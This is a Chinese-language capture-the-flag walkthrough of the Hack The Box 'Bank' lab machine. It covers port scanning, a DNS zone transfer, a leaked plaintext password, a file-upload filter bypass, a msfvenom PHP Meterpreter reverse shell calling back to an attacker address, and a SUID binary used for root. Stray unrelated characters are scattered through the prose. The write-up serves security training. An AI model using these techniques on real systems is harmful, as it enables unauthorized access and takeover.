開放端口
┌──(root?rock)-[~]
└─# nmap -p- --open 10.10.10.29 -Pn
Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-23 08:34 EDT
Stats: 0:00:23 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 93.67% done; ETC: 08:35 (0:00:02 remaining)
Nmap scan report for 10.10.10.29
Host is up (0.073s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
53/tcp open domain
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 25.23 seconds
詳細端口信息
┌──(root?rock)-[~]
└─# nmap -sV -Pn -A -O 10.10.10.29 -p 22,53,80
Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-23 08:36 EDT
Nmap scan report for 10.10.10.29
Host is up (0.072s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 08:ee:d0:30:d5:45:e4:59:db:4d:54:a8:dc:5c:ef:15 (DSA)
| 2048 b8:e0:15:48:2d:0d:f0:f1:73:33:b7:81:64:08:4a:91 (RSA)
| 256 a0:4c:94:d1:7b:6e:a8:fd:07:fe:11:eb:88:d5:16:65 (ECDSA)
|_ 256 2d:79:44:30:c8:bb:5e:8f:07:cf:5b:72:ef:a1:6d:67 (ED25519)
53/tcp open domain ISC BIND 9.9.5-3ubuntu0.14 (Ubuntu Linux)
| dns-nsid:
|_ bind.version: 9.9.5-3ubuntu0.14-Ubuntu
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.7 (Ubuntu)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.13 (95%), Linux 3.16 (95%), Linux 3.2 - 4.9 (95%), Linux 4.8 (95%), Linux 4.4 (95%), Linux 4.9 (95%), Linux 3.12 (95%), Linux 3.8 - 3.11 (95%), Linux 4.2 (95%), ASUS RT-N56U WAP (Linux 3.4) (95%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 72.25 ms 10.10.14.1
2 73.27 ms 10.10.10.29
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.26 seconds
DNS
首先按照htb的習慣匾竿,我們假定靶機的域名是bank.htb脏毯,依此執(zhí)行Zone Transfer
┌──(root??kali)-[~/htb/bank]
└─# dig axfr bank.htb @10.10.10.29
; <<>> DiG 9.18.0-2-Debian <<>> axfr bank.htb @10.10.10.29
;; global options: +cmd
bank.htb. 604800 IN SOA bank.htb. chris.bank.htb. 5 604800 86400 2419200 604800
bank.htb. 604800 IN NS ns.bank.htb.
bank.htb. 604800 IN A 10.10.10.29
ns.bank.htb. 604800 IN A 10.10.10.29
www.bank.htb. 604800 IN CNAME bank.htb.
bank.htb. 604800 IN SOA bank.htb. chris.bank.htb. 5 604800 86400 2419200 604800
;; Query time: 971 msec
;; SERVER: 10.10.10.29#53(10.10.10.29) (TCP)
;; WHEN: Thu Sep 29 01:54:32 EDT 2022
;; XFR size: 6 records (messages 1, bytes 171)
果然爆出了幾個域名
把bank.htb滴某,www.bank.htb乡翅,ns.bank.htb剪个,chris.bank.htb全部添加進host文件
www.bank.htb秧骑,ns.bank.htb,chris.bank.htb導向了apache開始頁
bank.htb導向一個登陸頁面
web
從bank.htb的登陸頁面可知網(wǎng)站是用php寫的,我們在爆破目錄的時候可以帶上php后綴
┌──(root?rock)-[~]
└─# gobuster dir -t 50 --no-error --url http://bank.htb -w /usr/share/wordlists/Web-Content/directory-list-2.3-medium.txt -x php
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://bank.htb
[+] Method: GET
[+] Threads: 50
[+] Wordlist: /usr/share/wordlists/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: php
[+] Timeout: 10s
===============================================================
2022/09/29 14:06:54 Starting gobuster in directory enumeration mode
===============================================================
/uploads (Status: 301) [Size: 305] [--> http://bank.htb/uploads/]
/assets (Status: 301) [Size: 304] [--> http://bank.htb/assets/]
/login.php (Status: 200) [Size: 1974]
/support.php (Status: 302) [Size: 3291] [--> login.php]
/index.php (Status: 302) [Size: 7322] [--> login.php]
/logout.php (Status: 302) [Size: 0] [--> index.php]
/inc (Status: 301) [Size: 301] [--> http://bank.htb/inc/]
/server-status (Status: 403) [Size: 288]
/balance-transfer (Status: 301) [Size: 314] [--> http://bank.htb/balance-transfer/]
===============================================================
2022/09/29 14:18:03 Finished
===============================================================
/balance-transfer頁面列出了很多.acc文件乎折,內(nèi)容大概是:
++OK ENCRYPT SUCCESS
+=================+
| HTB Bank Report |
+=================+
===UserAccount===
Full Name: balance-transfer
Email: H7SACcJdBQfDCk1uCXeeEO2WZkpmfwFXExxgKhtl8JYK40eGXsVChXygiYDxujv8Q3pAkTWtDUdHVsnSVjvch3tz167wpCEgF4R0YNtBIHiD9Gw4Z1hh4KQ6QYCgAhxg
Password: mohkbKVUrexBU4GU5XbaH2hy0UPBbmRyK8TWTPQl3oWXsCSxA3Ii5ZR6TGH53zDNIwKBmBXpZUnswfZ7jIppHgvAWdFZMjNuQy6c93C9YZBufBCyj1X0itBfGgetA2Yr
CreditCards: 3
Transactions: 13
Balance: 6423573 .
===UserAccount===
foothold
可以看見有Email和Password字段绒疗,但是被加密了。一開始以為是base64笆檀,但嘗試解密失敗
++OK ENCRYPT SUCCESS表明加密成功會打印這一行忌堂,這個文件可能是某種日志,有成功的就有可能有失敗的打印
一個個文件查看不太現(xiàn)實酗洒,最好寫腳本或者用命令行去比較文件的差異
這里我直接抄0xdf的命令。枷遂。
比較頁面字數(shù)樱衷,從低到高排列
┌──(root??kali)-[~/htb/bank]
└─# curl -s http://bank.htb/balance-transfer/ | grep -F '.acc' | grep -Eo '[a-f0-9]{32}\.acc.*"right">.+ ' | cut -d'>' -f1,7 | tr '">' ' ' | sort -k2 -n | head
68576f20e9732f1b2edc4df5b8533230.acc 257
09ed7588d1cd47ffca297cc7dac22c52.acc 581
941e55bed0cb8052e7015e7133a5b9c7.acc 581
052a101eac01ccbf5120996cdc60e76d.acc 582
0d64f03e84187359907569a43c83bddc.acc 582
10805eead8596309e32a6bfe102f7b2c.acc 582
20fd5f9690efca3dc465097376b31dd6.acc 582
346bf50f208571cd9d4c4ec7f8d0b4df.acc 582
70b43acf0a3e285c423ee9267acaebb2.acc 582
780a84585b62356360a9495d9ff3a485.acc 582
有一個字數(shù)短了一大半,查看這個文件
┌──(root??kali)-[~/htb/bank]
└─# curl http://bank.htb/balance-transfer/68576f20e9732f1b2edc4df5b8533230.acc
--ERR ENCRYPT FAILED
+=================+
| HTB Bank Report |
+=================+
===UserAccount===
Full Name: Christos Christopoulos
Email: chris@bank.htb
Password: !##HTBB4nkP4ssw0rd!##
CreditCards: 5
Transactions: 39
Balance: 8842803 .
===UserAccount===
--ERR ENCRYPT FAILED表明加密失敗酒唉,露出了明文密碼
使用這個密碼在首頁登陸矩桂,順利進入后臺
在support頁面有一個上傳文件功能
查看網(wǎng)頁源代碼發(fā)現(xiàn)這一句
[DEBUG] I added the file extension .htb to execute as php for debugging purposes only [DEBUG]
看來只需要把php后綴換成htb就可以繞過
編譯一個php馬
msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.16.3 LPORT=4444 -f raw > shell.php
換成htb后綴
mv shell.php shell.htb
上傳,點擊痪伦,拿到立足點
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.10.16.3:4444
[*] Sending stage (39860 bytes) to 10.10.10.29
[*] Meterpreter session 1 opened (10.10.16.3:4444 -> 10.10.10.29:40126) at 2022-09-29 02:49:59 -0400
meterpreter > getuid
Server username: www-data
提權
枚舉所有SUID
www-data@bank:/home/chris$ find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
/var/htb/bin/emergency
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/bin/at
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/pkexec
/usr/bin/newgrp
/usr/bin/traceroute6.iputils
/usr/bin/gpasswd
/usr/bin/sudo
/usr/bin/mtr
/usr/sbin/uuidd
/usr/sbin/pppd
/bin/ping
/bin/ping6
/bin/su
/bin/fusermount
/bin/mount
/bin/umount
發(fā)現(xiàn)一個不常見的SUID
/var/htb/bin/emergency
嘗試執(zhí)行侄榴,直接提權到了root。网沾。
www-data@bank:/home/chris$ /var/htb/bin/emergency
/var/htb/bin/emergency
# id
id
uid=33(www-data) gid=33(www-data) euid=0(root) groups=0(root),33(www-data)
# whoami
whoami
root
